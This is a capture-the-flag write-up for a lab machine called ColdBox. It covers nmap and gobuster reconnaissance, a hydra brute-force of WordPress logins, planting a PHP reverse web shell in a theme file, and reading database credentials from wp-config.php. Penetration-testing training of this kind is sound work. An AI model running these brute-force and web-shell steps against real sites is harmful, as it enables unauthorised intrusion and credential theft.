ColdBox

Task 1 - Deploy the machine

🎯 Target IP: 10.10.100.105

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.100.105 coldbox.thm" >> /etc/hosts

mkdir thm/coldbox.thm
cd thm/coldbox.thm
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 coldbox.thm
PING coldbox.thm (10.10.100.105) 56(84) bytes of data.
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=1 ttl=63 time=65.4 ms
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=2 ttl=63 time=61.1 ms
64 bytes from coldbox.thm (10.10.100.105): icmp_seq=3 ttl=63 time=60.5 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.

Of course, start to check information scanning open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 coldbox.thm -oG nmap/port_scan

PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 63
4512/tcp open  unknown syn-ack ttl 63

It looks like there are 2 open ports on the machine: 80, 4512

Now, we need to search which services are running on open ports:

nmap -p80,4512 -n -Pn -vvv -sCV --min-rate 5000 coldbox.thm -oN nmap/open_port

PORT     STATE SERVICE REASON         VERSION
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
4512/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDngxJmUFBAeIIIjZkorYEp5ImIX0SOOFtRVgperpxbcxDAosq1rJ6DhWxJyyGo3M+Fx2koAgzkE2d4f2DTGB8sY1NJP1sYOeNphh8c55Psw3Rq4xytY5u1abq6su2a1Dp15zE7kGuROaq2qFot8iGYBVLMMPFB/BRmwBk07zrn8nKPa3yotvuJpERZVKKiSQrLBW87nkPhPzNv5hdRUUFvImigYb4hXTyUveipQ/oji5rIxdHMNKiWwrVO864RekaVPdwnSIfEtVevj1XU/RmG4miIbsy2A7jRU034J8NEI7akDB+lZmdnOIFkfX+qcHKxsoahesXziWw9uBospyhB
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKNmVtaTpgUhzxZL3VKgWKq6TDNebAFSbQNy5QxllUb4Gg6URGSWnBOuIzfMAoJPWzOhbRHAHfGCqaAryf81+Z8=
|   256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/fNq/6XnAxR13/jPT28jLWFlqxd+RKSbEgujEaCjEc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Task 3 - User flag?

Then we can start to see website (port 80):

we can see that's a wordpress web site, then we can try to see page source for checking information disclosure.

but we don't find precious info.

Another good thing to do, is find hidden paths on website using gobuster

gobuster dir -u coldbox.thm -w /usr/share/wordlists/dirb/common.txt

Very good, we can start to check these web dir:

/hidden/

Very good, there're precious info about usernames: C0ldd, Hugo and Philip.

We can confirm it watching error message at login in a default login path for wordpress: /wp-admin/

Finally the's another good info

If we don't waste time, we can use wpscan to find user list, but we'll take it if we take results with our three users, then try to login with C0ldd/Hugo/Philip:password123 (what we've see in the hidden path).

Nothing to do, we need to use brute force attack.

Then, we save them in a file called users.txt, and run hydra with a password wordlist to take a brute force attack:

echo "C0ldd\nHugo\nPhilip" > users.txt
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldbox.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

C0ldd:9876543210

Now we can use this credentials to log in wordpress and ssh.

Check user list, to see them and theirs role/permissions:

Very good, C0ldd is administrator.

Now, we need to access at machine using web shell, find it on our kali web-shells folder or use pentester monkey website:

We need to edit it using our credentials (LHOST and LPORT):

and upload it on media library page:

But, trying to change extension, upload doesn't work.

Then, we can try to use wordpress themes or plugins how vector to inject our web-shell.

Starting with themes, we edit header.php page in the twentyfifteen theme using the same php web-shell:

Update file, run netcat listener on the same port '1234':

Go to: http://coldbox.thm/wp-content/themes/twentyfifteen/header.php

We can upgrade this to a fully interactive shell by running:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

and retrieve credentials inside wp-config.php file.

cat /var/www/html/wp-config.php | grep "DB_USER"
#define('DB_USER', 'c0ldd');
cat /var/www/html/wp-config.php | grep "DB_PASSWORD"
#define('DB_PASSWORD', 'cybersecurity');
su c0ldd #inser psw and read flag.